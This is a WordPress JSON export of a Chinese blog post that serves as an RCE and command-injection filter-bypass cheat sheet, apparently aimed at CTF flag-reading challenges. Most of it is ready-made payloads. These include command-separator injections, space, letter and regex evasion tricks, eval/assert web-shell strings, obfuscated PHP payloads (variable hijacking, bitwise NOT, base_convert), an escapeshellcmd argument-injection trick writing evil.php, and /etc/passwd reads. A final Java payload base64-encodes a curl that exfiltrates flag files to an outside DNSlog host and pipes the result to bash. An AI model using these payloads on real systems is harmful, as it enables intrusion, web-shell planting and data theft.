{"id":51,"date":"2026-03-14T22:30:57","date_gmt":"2026-03-14T14:30:57","guid":{"rendered":"http:\/\/47.118.30.30\/?p=51"},"modified":"2026-03-15T11:40:56","modified_gmt":"2026-03-15T03:40:56","slug":"rce%e7%bb%95%e8%bf%87","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/rce%e7%bb%95%e8%bf%87\/","title":{"rendered":"RCE\u7ed5\u8fc7"},"content":{"rendered":"

RCE<\/strong><\/h1>\n

\u6ce8\u5165\u5165\u53e3\uff1a<\/h3>\n
PHP\uff1asystem()\uff0cexec()\uff0cshell_exec()\uff0cpassthru()\uff0cshell_exec()\nJAVA:Runtime.exec()\uff0cProcessBuilder()\nPYTHON:os.system()\uff0csubprocess()\uff0csubprocess.call(command, shell=True)\uff0csubprocess.Popen(command, shell=True)\uff0c\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0subprocess.run(..., shell=True)\nNode.js\uff1achild_process.exec(command)\uff0cchild_process.execSync()\uff0cchild_process.spawn(..., { shell: true })<\/code><\/pre>\n
\u57fa\u672c\u547d\u4ee4\uff1a<\/h3>\n
ls      \u5217\u51fa\u76ee\u5f55\u5e76\u8f93\u51fa\ncat     \u7531\u7b2c\u4e00\u884c\u5f00\u59cb\u663e\u793a\u5185\u5bb9\uff0c\u5e76\u5c06\u6240\u6709\u5185\u5bb9\u8f93\u51fa\ntac     \u4ece\u6700\u540e\u4e00\u884c\u5012\u5e8f\u663e\u793a\u5185\u5bb9\uff0c\u5e76\u5c06\u6240\u6709\u5185\u5bb9\u8f93\u51fa\nnl      \u7c7b\u4f3c\u4e8ecat -n\uff0c\u663e\u793a\u65f6\u8f93\u51fa\u884c\u53f7\nmore    \u6839\u636e\u7a97\u53e3\u5927\u5c0f\uff0c\u4e00\u9875\u4e00\u9875\u7684\u73b0\u5b9e\u6587\u4ef6\u5185\u5bb9\nless    \u548cmore\u7c7b\u4f3c\uff0c\u4f46\u5176\u4f18\u70b9\u53ef\u4ee5\u5f80\u524d\u7ffb\u9875\uff0c\u800c\u4e14\u8fdb\u884c\u53ef\u4ee5\u641c\u7d22\u5b57\u7b26\nhead    \u53ea\u663e\u793a\u5934\u51e0\u884c\ntail    \u53ea\u663e\u793a\u6700\u540e\u51e0\u884c\nsort    \u6587\u4ef6\u5185\u5bb9\u8fdb\u884c\u884c\u95f4\u7684\u6392\u5e8f\u5e76\u8f93\u51fa\u6587\u672c sort flag.php\nvim     \u4e00\u79cd\u7f16\u8f91\u5668\uff0c\u8fd9\u4e2a\u4e5f\u53ef\u4ee5\u67e5\u770b\nod      \u4ee5\u4e8c\u8fdb\u5236\u7684\u65b9\u5f0f\u8bfb\u53d6\u6863\u6848\u5185\u5bb9\nvi      \u4e00\u79cd\u7f16\u8f91\u5668 vi flag.php\nstrings \u5728\u5bf9\u8c61\u6587\u4ef6\u6216\u4e8c\u8fdb\u5236\u6587\u4ef6\u4e2d\u67e5\u627e\u53ef\u6253\u5370\u7684\u5b57\u7b26\u4e32, \u5728\u5f53\u524d\u76ee\u5f55\u4e2d\uff0c\u67e5\u627e\u540e\u7f00\u6709 file \u5b57\u6837\u7684\u6587\u4ef6\u4e2d\u5305\u542b test \u5b57\u7b26\u4e32\u7684\u6587\u4ef6\uff0c\u5e76\u6253\u5370\u51fa\u8be5\u5b57\u7b26\u4e32\u7684\u884c\u3002\u6b64\n        \u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\uff1a grep test *file strings\npaste    \u628a\u6bcf\u4e2a\u6587\u4ef6\u4ee5\u5217\u5bf9\u5217\u7684\u65b9\u5f0f\uff0c\u4e00\u5217\u5217\u5730\u52a0\u4ee5\u5408\u5e76 \ngrep    \u67e5\u8be2\u6587\u4ef6\u4e2d\u5305\u542b\u67d0\u4e2a\u7279\u5b9a\u5b57\u7b26\u4e32\u7684\u884c\u5e76\u8f93\u51fa grep 'fla' flag.php\nsed        \u4e00\u79cd\u7f16\u8f91\u5668\uff0c\u53ef\u4ee5\u7528sed -f flag.php\u8bfb\u53d6flag (sed\u4e5f\u53ef\u4ee5\u7528\u6765\u5220\u9664\u7279\u5b9a\u5b57\u7b26)\nrev     \u53cd\u8f6c\nuniq    \u5220\u9664\u6587\u4ef6\u91cd\u590d\u884c\u5e76\u8f93\u51fa\u5269\u4f59\u5185\u5bb9\uff0c\u53ef\u4ee5\u7528\u4e8e\u6587\u4ef6\u8bfb\u53d6\u3002\u4e0ecat\u4e00\u6837\uff0c\u7ed3\u679c\u5728\u6e90\u4ee3\u7801\nbase64  \u53ef\u4ee5\u8bfb\u53d6flag.php\u5e76\u7f16\u7801\u540e\u8f93\u51fa (\/bin\/base64)base64 flag.php\nmv      \u5bf9\u6587\u4ef6\u8fdb\u884c\u91cd\u547d\u540d\uff0c\u901a\u8fc7\u4fee\u6539\u540e\u7f00\u540d\u4e3atxt\uff0c\u53ef\u4ee5\u76f4\u63a5\u5728\u7f51\u9875\u4e2d\u8bbf\u95eetxt\u6587\u4ef6 mv f?lg.php a.txt\ncp      \u5c06flag\u7684\u5185\u5bb9\u590d\u5236\u52301.txt\u4e0a\uff0c\u7136\u540e\u8bbf\u95ee\/1.txt\u6587\u4ef6\u8bfb\u53d6 cp flag.php 1.txt\nawk     awk '{print}' \/fla*  \u6253\u5370`\/` \u76ee\u5f55\u4e0b\u6240\u6709\u4ee5 `fla` \u5f00\u5934\u7684\u6587\u4ef6\u4e2d\u7684\u6bcf\u4e00\u884c\u5185\u5bb9\nassert  assert(eval($_POST[%27x%27]));\n``\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0php\u4e2d\u53cd\u5f15\u53f7\u4f1a\u5f53\u4f5csystem()\u6267\u884c\uff0c\u5982\uff1a`cat \/flag > aaa.txt`<\/code><\/pre>\n
\u5e38\u7528\u547d\u4ee4\u5206\u9694\u7b26\u8868<\/strong>\uff1a<\/h3>\n
;\uff1a\n\u547d\u4ee4\u5e8f\u5217\u5206\u9694\u7b26\uff0c\u987a\u5e8f\u6267\u884c\u591a\u4e2a\u547d\u4ee4\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1als; whoami\n\n&\uff1a\n\u540e\u53f0\u6267\u884c\u547d\u4ee4\uff0c\u4e0d\u7b49\u5f85\u524d\u4e00\u547d\u4ee4\u5b8c\u6210\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1aping 127.0.0.1 & whoami\n\n&&\uff1a\n\u4ec5\u5f53\u524d\u4e00\u547d\u4ee4\u6210\u529f\u6267\u884c\u65f6\u6267\u884c\u4e0b\u4e00\u547d\u4ee4\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1als \/tmp && whoami\n\n|\uff1a\n\u7ba1\u9053\u7b26\uff0c\u5c06\u524d\u4e00\u547d\u4ee4\u7684\u8f93\u51fa\u4f5c\u4e3a\u540e\u4e00\u547d\u4ee4\u7684\u8f93\u5165\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1acat \/etc\/passwd | grep root\n\n||\uff1a\n\u4ec5\u5f53\u524d\u4e00\u547d\u4ee4\u5931\u8d25\u6267\u884c\u65f6\u6267\u884c\u4e0b\u4e00\u547d\u4ee4\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1als \/nonexistent || whoami\n\n$()\uff1a\n\u547d\u4ee4\u66ff\u6362\uff0c\u6267\u884c\u62ec\u53f7\u5185\u7684\u547d\u4ee4\u5e76\u66ff\u6362\u4e3a\u6267\u884c\u7ed3\u679c\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\n\u4f8b\u5b50\uff1aecho $(whoami)\n\n``\uff1a\n\u547d\u4ee4\u66ff\u6362\uff08\u53cd\u5f15\u53f7\uff09\uff0c\u6267\u884c\u53cd\u5f15\u53f7\u5185\u7684\u547d\u4ee4\u5e76\u66ff\u6362\u4e3a\u6267\u884c\u7ed3\u679c\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\n\u4f8b\u5b50\uff1aecho whoami``\n\n>\uff1a\n\u8f93\u51fa\u91cd\u5b9a\u5411\uff0c\u5c06\u547d\u4ee4\u8f93\u51fa\u5199\u5165\u6587\u4ef6\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1awhoami > user.txt\n\n>>\uff1a\n\u8ffd\u52a0\u8f93\u51fa\u91cd\u5b9a\u5411\uff0c\u5c06\u547d\u4ee4\u8f93\u51fa\u8ffd\u52a0\u5230\u6587\u4ef6\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1awhoami >> user.txt\n\n<\uff1a\n\u8f93\u5165\u91cd\u5b9a\u5411\uff0c\u5c06\u6587\u4ef6\u5185\u5bb9\u4f5c\u4e3a\u547d\u4ee4\u8f93\u5165\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1acat < input.txt\n\n%0A\uff1a\nURL\u7f16\u7801\u7684\u6362\u884c\u7b26\uff0c\u5728\u67d0\u4e9b\u73af\u5883\u4e2d\u53ef\u4f5c\u4e3a\u547d\u4ee4\u5206\u9694\u7b26\n\u9002\u7528\uff1a\u6240\u6709\u7c7bUnix\u7cfb\u7edf\u3001Windows\n\u4f8b\u5b50\uff1als%0Awhoami<\/code><\/pre>\n
\u7ed5\u8fc7\uff1a<\/h3>\n
admin\u7ed5\u8fc7\uff1a<\/p>\n
\u5982\u679c\u5b58\u5728strlower\uff08\uff09\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u7528unicode\u4e0a\u6807\/\u4fee\u9970\u5b57\u6bcd\u7ed5\u8fc7,\u8fd9\u6837\u4f1a\u8f6c\u4e3a\u5927\u5199\u5b57\u6bcd\uff1a\n\u5982\uff1astrlower(\u1d2c\u1d30\u1d39\u1d35\u1d3a)=ADMIN<\/code><\/pre>\n
\u6bd4\u8f83\u7ed5\u8fc7\uff1a<\/p>\n
php\u5c06\u5b57\u7b26\u8ddf\u6570\u5b57\u8fdb\u884c\u5f31\u7c7b\u578b\u6bd4\u8f83\uff08==\uff09\u65f6\uff0c\u4f1a\u5148\u5c06\u5b57\u7b26\u4e32\u8f6c\u5316\u4e3a\u6570\u5b57\uff0c\u5373\u622a\u53d6\u7b2c\u4e00\u4e2a\u5b57\u7b26\u51fa\u73b0\u4e4b\u524d\u7684\u6570\u5b57\n<\/code><\/pre>\n
\u7ed5\u8fc7\u7a7a\u683c\uff1a<\/p>\n
${IFS}\n\/**\/\n$IFS$9  \u6bd4\u5982 tac$IFS$9flag.php\n%20\n%09\n<>\n<\n_\n-\n%a0<\/code><\/pre>\n
\u7ed5\u8fc7\u7b49\u53f7\uff1a<\/p>\n
like<\/code><\/pre>\n
\u4f7f\u7528\u516b\u8fdb\u5236\u7ed5\u8fc7\uff1a<\/p>\n
$'154163'    \/\/\u6267\u884cls\n\/\/linux\u4e2d\u4f7f\u7528$\u2019xxx\u2019\uff08xxx\u4e3a\u5b57\u7b26\u7684\u516b\u8fdb\u5236\uff09\u7684\u5f62\u5f0f\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u4ee3\u7801\n\/\/\u516b\u8fdb\u5236\u7ed5\u8fc7\u4e0d\u53ef\u76f4\u63a5\u6267\u884c\u542b\u53c2\u6570\u6307\u4ee4\uff0c\u9700\u8981\u91cd\u5b9a\u5411\u7b26\u53f7\u4ee3\u66ff\u547d\u4ee4\u4e2d\u7684\u7a7a\u683c\n$'143141164'<$'57146154141147'        \/\/cat<\/flag<\/code><\/pre>\n
\/ \u7ed5\u8fc7\uff1a<\/p>\n
cd ..;cd ..;cd ..;cd ..;cd etc;cat passwd<\/code><\/pre>\n
\u7ed5\u8fc7\uff1a<\/h1>\n
--+ \n%23<\/code><\/pre>\n
\u7ed5\u8fc7\u6b63\u5219\uff1a<\/p>\n
\u6b63\u5219\u5339\u914d\u65f6\u9ed8\u8ba4\u4e0d\u5339\u914d\u6362\u884c\u7b26\uff0c\u6240\u4ee5\u53ef\u4ee5\u63d2\u5165\u6362\u884c\u7b26\uff08%0a\uff09\u7ed5\u8fc7<\/p>\n
. \u7ed5\u8fc7L<\/p>\n
[]<\/code><\/pre>\n
\u2018 \u2018 \u7a7a\u5b57\u7b26\u5339\u914d\u7ed5\u8fc7\uff1a<\/p>\n
fl''ag = flag<\/code><\/pre>\n
 \u5339\u914d\u7ed5\u8fc7\uff1a<\/p>\n
?c=system(\"tac flag.php\")<\/code><\/pre>\n
URL\u7f16\u7801\u7ed5\u8fc7\uff1a<\/p>\n
\u5c31\u662f\u4f8b\u5982 ; \u88ab\u8fc7\u6ee4\u4e86\uff0c\u5c31\u53ef\u4ee5\u8fdb\u884cURL\u7f16\u7801\n\n\u5176\u4ed6\u7279\u6b8a\u5b57\u7b26\u4e5f\u540c\u7406<\/code><\/pre>\n
php\u7ed5\u8fc7\uff1a<\/p>\n
<?=\n\n<%\n\n<?echo ?>(\u547d\u4ee4\u653e\u5728\u91cc\u9762)<\/code><\/pre>\n
and\u7ed5\u8fc7\uff1a<\/p>\n
&&<\/code><\/pre>\n
\u5168\u90e8\u5b57\u6bcd\u7ed5\u8fc7\uff1a<\/p>\n
_\uff3f\uff49\uff4d\uff50\uff4f\uff52\uff54_\uff3f(\uff43\uff48\uff52(111)+\uff43\uff48\uff52(115)).\uff53\uff59\uff53\uff54\uff45\uff4d(\uff43\uff48\uff52(99)+\uff43\uff48\uff52(97)+\uff43\uff48\uff52(116)+\uff43\uff48\uff52(32)+\uff43\uff48\uff52(47)+\uff43\uff48\uff52(102)+\uff43\uff48\uff52(108)+\uff43\uff48\uff52(97)+\uff43\uff48\uff52(103))<\/code><\/pre>\n
\u4f20\u53c2\u7ed5\u8fc7\uff1a<\/p>\n
php:\n?c=eval($_GET[x]);&x=system(\"ls\");\n?c=eval($_GET[x]);&x=system(\"tac flag.php\");\n\npython:\nopen(request.args.get('file')).read()\nopen(request.form.get('path')).read()\nopen(request.json.get('filename')).read()<\/code><\/pre>\n
include\u51fd\u6570\uff1a<\/p>\n
?c=include($_GET[x]);&x=php:\/\/filter\/convert.iconv.UTF8.UTF16\/resource=flag.php<\/code><\/pre>\n
\u5982\u679c(\u548c;\u88ab\u8fc7\u6ee4\uff1a
\n%0a \u662f URL \u7f16\u7801\u4e2d\u8868\u793a\u6362\u884c\u7b26\uff08n\uff09\u7684\u5b57\u7b26\u3002\u4ece\u800c\u4f7f\u5f97 include \u8bed\u53e5\u548c $_GET[1] \u7684\u5904\u7406\u88ab\u5206\u5f00\uff0c\u4ece\u800c\u7ed5\u8fc7\u8fc7\u6ee4\u673a\u5236\uff0c\u4e0d\u8fc7include\u51fd\u6570\u8fd9\u91cc\u4e0d\u52a0(\u4e5f\u662f\u53ef\u4ee5\u7684
\nphp\u9047\u5230\u5b9a\u754c\u7b26\u5173\u95ed\u6807\u7b7e\u4f1a\u81ea\u52a8\u5728\u672b\u5c3e\u52a0\u4e0a\u4e00\u4e2a\u5206\u53f7\u3002\u7b80\u5355\u6765\u8bf4\uff0c\u5c31\u662fphp\u6587\u4ef6\u4e2d\u6700\u540e\u4e00\u53e5\u5728?>\u524d\u53ef\u4ee5\u4e0d\u5199\u5206\u53f7<\/p>\n
?c=include%0a$_GET[1]?>&1=php:\/\/filter\/convert.iconv.UTF8.UTF16\/resource=flag.php\n?c=include$_GET[1]?>&1=php:\/\/filter\/convert.iconv.UTF8.UTF16\/resource=flag.php<\/code><\/pre>\n
session_start()\uff1a<\/p>\n
?c = session_id(session_start());\nCookies:PHPSESSID=????\n\/\/\u5e76\u5728cookies\u4e2d\u4f20\u5165\u4f60\u9700\u8981\u6267\u884c\u7684\u547d\u4ee4<\/code><\/pre>\n
\u53d8\u91cf\u631f\u6301\u7ed5\u8fc7\uff1a<\/p>\n
?c=eval(array_pop(next(get_defined_vars())));\nPOST\u4f20\u5165: 1=system('tac fl*');\n\nget_defined_vars()\n\u83b7\u53d6\u5f53\u524d\u4f5c\u7528\u57df\u4e2d\u6240\u6709\u5b9a\u4e49\u7684\u53d8\u91cf\uff0c\u8fd4\u56de\u4e00\u4e2a\u6570\u7ec4\uff0c\u952e\u662f\u53d8\u91cf\u540d\uff0c\u503c\u662f\u5bf9\u5e94\u7684\u53d8\u91cf\u503c\nnext(get_defined_vars())\n\u5c06\u6307\u9488\u79fb\u52a8\u5230\u6570\u7ec4\u4e2d\u7684\u4e0b\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8fd4\u56de\u8be5\u5143\u7d20\u7684\u503c\u3002\u5728\u8fd9\u91cc\uff0c\u6307\u9488\u64cd\u4f5c\u7684\u5bf9\u8c61\u662f\u7531 get_defined_vars() \u8fd4\u56de\u7684\u6570\u7ec4\narray_pop(...)\n\u5f39\u51fa\u6570\u7ec4\u7684\u6700\u540e\u4e00\u4e2a\u5143\u7d20\u3002\u8fd9\u91cc\u4f5c\u7528\u5728 next(get_defined_vars()) \u7684\u7ed3\u679c\u4e0a\uff0c\u83b7\u53d6\u8fd9\u4e2a\u6570\u7ec4\u7684\u6700\u540e\u4e00\u4e2a\u53d8\u91cf\u503c<\/code><\/pre>\n
\u81ea\u589e\u7ed5\u8fc7\uff1a<\/p>\n
<\/code><\/pre>\n
$_=[]._;$__=$_[1];$_=$_[0];$_++;$_0=++$_;$_++;$_++;$_++;$_++;$_=$_0.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);<\/code><\/pre>\n
\u6587\u4ef6\u679a\u4e3e\u7ed5\u8fc7:<\/p>\n
getcwd() \u51fd\u6570\u8fd4\u56de\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u7684\u8def\u5f84\nscandir() \u51fd\u6570\u5217\u51fa\u6307\u5b9a\u76ee\u5f55\u4e2d\u7684\u6240\u6709\u6587\u4ef6\u548c\u76ee\u5f55\uff0c\u5e76\u8fd4\u56de\u4e00\u4e2a\u5305\u542b\u6587\u4ef6\u548c\u76ee\u5f55\u540d\u79f0\u7684\u6570\u7ec4\nshow_source() \u51fd\u6570\u7528\u4e8e\u663e\u793a\u4e00\u4e2a PHP \u6587\u4ef6\u7684\u6e90\u4ee3\u7801\nlocaleconv()\u8fd4\u56de\u4e00\u4e2a\u5305\u542b\u672c\u5730\u6570\u5b57\u53ca\u8d27\u5e01\u683c\u5f0f\u4fe1\u606f\u7684\u6570\u7ec4,\u8be5\u6570\u7ec4\u7684\u7b2c\u4e00\u9879\u5c31\u662f\u2019.\u2019\n\n?c=show_source(scandir(getcwd())[2]);\n\u8fd9\u91cc\u7684[2]\u8981\u591a\u5c1d\u8bd5\uff0cflag\u6587\u4ef6\u7684\u4f4d\u7f6e\u4e0d\u4e00\u5b9a\u4f1a\u5728\u7b2c2\u4f4d\uff0carray_rand()\u62bd\u7b7e\u4e5f\u53ef\n?c=show_source(scandir(dirname(__FILE__))[array_rand(scandir(dirname(__FILE__)))]);<\/code><\/pre>\n
\u76ee\u5f55\u7a7f\u8d8a\u7ed5\u8fc7:<\/p>\n
\u8bfb\u53d6\u6700\u540e\u4e00\u4e2a\u6587\u4ef6\n?c=show_source(current(array_reverse(scandir(getcwd()))));\n\u8bfb\u53d6\u5012\u6570\u7b2c\u4e8c\u4e2a\u5143\u7d20\n?c=show_source(next(array_reverse(scandir(getcwd()))));\n?c=echo highlight_file(current(array_reverse(scandir(pos(localeconv())))));\n?c=echo highlight_file(next(array_reverse(scandir(pos(localeconv())))));\n\ndirname()\uff1a\u7528\u4e8e\u83b7\u53d6\u8def\u5f84\u7684\u76ee\u5f55\u90e8\u5206\u3002dirname('FILE');\u8fd4\u56de \u2018.\u2019\nscandir()\uff1a\u5217\u51fa\u6307\u5b9a\u76ee\u5f55\u4e2d\u7684\u6587\u4ef6\u548c\u76ee\u5f55\uff0c\u8fd4\u56de\u4e00\u4e2a\u6570\u7ec4\nprint_r()\uff1a\u8f93\u51fa\u53d8\u91cf\u7684\u6613\u8bfb\u4fe1\u606f\uff0c\u9002\u5408\u7528\u4e8e\u8c03\u8bd5\u548c\u67e5\u770b\u6570\u7ec4\u5185\u5bb9\n__FILE__ __DIR__\uff1a\u662fphp\u4e2d\u7684\u9b54\u672f\u65b9\u6cd5\uff0c\u53ef\u4ee5\u7528\u4e8e\u83b7\u53d6\u5f53\u524d\u76ee\u5f55\u4e0e\u4e0a\u7ea7\u76ee\u5f55\uff0c\u901a\u8fc7\u8fed\u4ee3dirname\u51fd\u6570\u5c31\u80fd\u5b9e\u73b0\u76ee\u5f55\u904d\u5386\nc=print_r(scandir(dirname(__FILE__)));  \/\/ \u8bfb\u53d6\u5f53\u524d\u76ee\u5f55\nc=print_r(scandir(dirname(__DIR__)));   \/\/ \u8bfb\u53d6\u4e0a\u7ea7\u76ee\u5f55\nc=print_r(scandir(dirname(dirname(__FILE__))));\/\/\u8bfb\u53d6\u4e0a\u7ea7\u76ee\u5f55\nc=print_r(scandir(dirname(dirname(__DIR__))));\/\/\u8bfb\u53d6\u4e0a\u4e0a\u7ea7\u76ee\u5f55\nc=print_r(scandir(dirname(dirname(dirname(dirname(__DIR__))))));\n\nchdir:\u6539\u53d8\u76ee\u5f55\n?c=chdir(dirname(__FILE__));hightlight_file(\"flag.php\");<\/code><\/pre>\n
\u8bfb\u53d6\u6587\u4ef6\u7ed5\u8fc7\uff1a<\/p>\n
highlight_file(\"flag.php\")\n\n\u76f8\u4f3c\u7684\u8fd8\u6709\nshow_source()\nreadgzfile()\nrequire_once()\nopen_basedir\n\n\u6216\u8005\u53ef\u4ee5\u5199\u6587\u4ef6<?php highlight_file(\"var\/www\/html\/includes\/flag.php\");?><\/code><\/pre>\n
\u53d8\u91cf\u5f39\u51fa\uff1a<\/p>\n
Var_dump(reset(getallheaders()));\n\/\/\u63d0\u53d6\u6240\u6709 http \u5934\n\/\/reset\u53ef\u80fd\u6362\u6210end\uff0c\u770b\u5f39\u51fa\u662f\u987a\u5e8f\u8fd8\u662f\u9006\u5e8f\uff0creset\u63d0\u53d6\u7b2c\u4e00\u4e2a\uff0cend\u63d0\u53d6\u6700\u540e\u4e00\u4e2a\n\u7136\u540e\u6dfb\u52a0\u81ea\u521b\u8868\u5934\uff0c\u5982\uff1aabc:system(\u201cls \/\u201d);\n\u7528\u6700\u5f00\u59cb\u90a3\u4e2a\u9a8c\u8bc1\uff0c\u4e4b\u540eVar_dump \u6539\u4e3a eval \u53ef\u4ee5\u547d\u4ee4\u6267\u884c<\/code><\/pre>\n
php\u533f\u540d\u51fd\u6570(create_function())\u7ed5\u8fc7\uff1a<\/p>\n
\u5982\uff1acreate_function('$a,$b',\"return (strlen($a)-strlen($b)+\" . \"strlen($c));\");\u4e2d\uff0c\u4f1a\u6267\u884c\u540e\u4e00\u4e2a\u53c2\u6570\u4e2d\u7684\u8bed\u53e5\uff0c\u53ef\u4ee5\u63d0\u524d\u95ed\u5408\u8fd9\u4e2a\u53c2\u6570\u4e2d\u7684\u8bed\u53e5\u518d\u7528}\u522b\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u518d\u62fc\u63a5\u8981\u6267\u884c\u7684\u8bed\u53e5\u7136\u540e\u518d\u6ce8\u91ca\u6389\u540e\u9762\u7684\n?c=1));}phpinfo();\/*\n\u533f\u540d\u51fd\u6570\u7ec4\u5408\u540e\uff1a\nfunction ft($a,$b){\n    return (strlen($a)-strlen($b)+\" . \"strlen(1));\n    }\n    phpinfo();\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u8fd9\u91cc\u4f1a\u6267\u884c\u51fd\u6570\n    \/*));\n}\n\n\u5bf9\u4e8e$a(\"\",$b);\n\u53ef\u4ee5\uff1a?a='creat_function'&b=\"}`xxd \/???g`;\/\/\"<\/code><\/pre>\n
escapeshellarg escapeshellcmd\u5148\u540e\u4f7f\u7528\u53ef\u80fd\u4ea7\u751f\u6f0f\u6d1e\uff1a<\/p>\n
escapeshellarg()\uff1a\u5728\u6574\u4e2a\u5b57\u7b26\u4e32\u5468\u56f4\u6dfb\u52a0\u5355\u5f15\u53f7\uff0c\u5c06\u5b57\u7b26\u4e32\u4e2d\u5df2\u6709\u7684\u5355\u5f15\u53f7\u8f6c\u4e49\u4e3a '''\nescapeshellcmd()\uff1a\u8f6c\u4e49\u4ee5\u4e0b\u5b57\u7b26\uff1a#&;|*?~<>^()[]{}$`\u3001\u6362\u884c\u7b26\u548c\u56de\u8f66\u7b26\n$input = \"' <?php code ?> -oG evil.php '\";\n$arg = escapeshellarg($input); \n\/\/ \u7ed3\u679c: '''' <?php code ?> -oG evil.php ''''\n$cmd = escapeshellcmd($arg);\n\/\/ \u7ed3\u679c: ''\\'' <?php code ?> -oG evil.php '\\'''\n''\\'' \u88ab\u89e3\u6790\u4e3a\u5b57\u9762\u5b57\u7b26\u4e32 \uff0c\u4e2d\u95f4\u7684 <?php code ?> -oG evil.php\u56e0\u5f15\u53f7\u88ab\u7834\u574f\u800c\u6210\u4e3a\u72ec\u7acb\u53c2\u6570\u3002<\/code><\/pre>\n
\u6570\u5b57\u51fd\u6570\u7ed5\u8fc7\uff1a<\/p>\n
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac flag.php\n\u5206\u6790\uff1a\nbase_convert(37907361743,10,36) => \"hex2bin\"\ndechex(1598506324) => \"5f474554\"\n$pi=hex2bin(\"5f474554\") => $pi=\"_GET\"   \/\/hex2bin\u5c06\u4e00\u4e3216\u8fdb\u5236\u6570\u8f6c\u6362\u4e3a\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\n($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs}  \/\/{}\u53ef\u4ee5\u4ee3\u66ff[] \n\n$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})\n\u5206\u6790\uff1a \nbase_convert(696468,10,36) => \"exec\"\n$pi(8768397090111664438,10,30) => \"getallheaders\"\nexec(getallheaders(){1})\n\/\/\u64cd\u4f5cxx\u548cyy\uff0c\u4e2d\u95f4\u7528\u9017\u53f7\u9694\u5f00\uff0cecho\u90fd\u80fd\u8f93\u51fa\necho xx,yy \nheader\u4f20\u53c2\u5373\u53ef\n<\/code><\/pre>\n
\u53d6\u53cd\u7ed5\u8fc7\uff1a<\/p>\n
\u539f\u7406\uff1a\u5c06\u4ee3\u7801\u53d6\u53cd\u8fc7\u540e\u518durl\u7f16\u7801\u518d\u53d6\u53cd\u53d1\u7ed9\u670d\u52a1\u5668\uff0c\u670d\u52a1\u5668url\u89e3\u7801\u540e\u4f1a\u53d8\u4e3a\u4e0d\u53ef\u89c1\u5b57\u7b26\u4ee5\u6b64\u7ed5\u8fc7\uff0cban\u5b57\u6bcd\u6570\u5b57\u53ef\u7528\n<?php\n$a='assert';\necho(urlencode(~$a));\necho('<p>');\n$b='(eval($_POST[inex]))';\necho(urlencode(~$b)); \n\u8f93\u51fa\uff1a%9E%8C%8C%9A%8D%8B<p>%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%96%91%9A%87%A2%D6%D6\n\u7136\u540e\u4f20\u53c2\uff1a?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%92%90%9C%97%8A%C8%A2%D6%D6);\n\n<?php\n$str = \"phpinfo\"; \n$payload = \"\";\nfor($i=0; $i<strlen($str); $i++){\n    $payload .= \"%\" . strtoupper(dechex(ord(~$str[$i])));\n}\necho \"(~'$payload')();\";\n?><\/code><\/pre>\n
java\u57fa\u672c\u901a\u7528rce\uff1a<\/p>\n
java.lang.Runtime.getRuntime().exec(\"payload\")<\/code><\/pre>\n
DNSlog\u5916\u5e26\uff1a<\/p>\n
java.lang.Runtime.getRuntime().exec(\"bash -c {echo,Y3VybCBgY2F0IC9mKmAuM2p1c2V2NTUucmVxdWVzdHJlcG8uY29t}|{base64,-d}|{bash,-i}\")\n\nx=base64(curl `cat \/f*`.\u4f60\u7684DNS\u7f51\u5740)\nbash -c {echo,\u8fd9\u91cc\u653ex}|{base64,-d}|{bash,-i}\n\u53bb\u5728\u7ebf\u7f51\u7ad9\u627e\u4e2aDNSlog\u7f51\u5740\uff0c\u62ff\u5230DNS\u7f51\u5740\u540ebase64\u52a0\u5bc6\u5d4c\u5165payload\u5f53\u4e2d\u3002<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
RCE \u6ce8\u5165\u5165\u53e3\uff1a PHP\uff1asystem()\uff0cexec()\uff0cshell_exec()\uff0cpassthru()\uff0cs […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-51","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/51","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/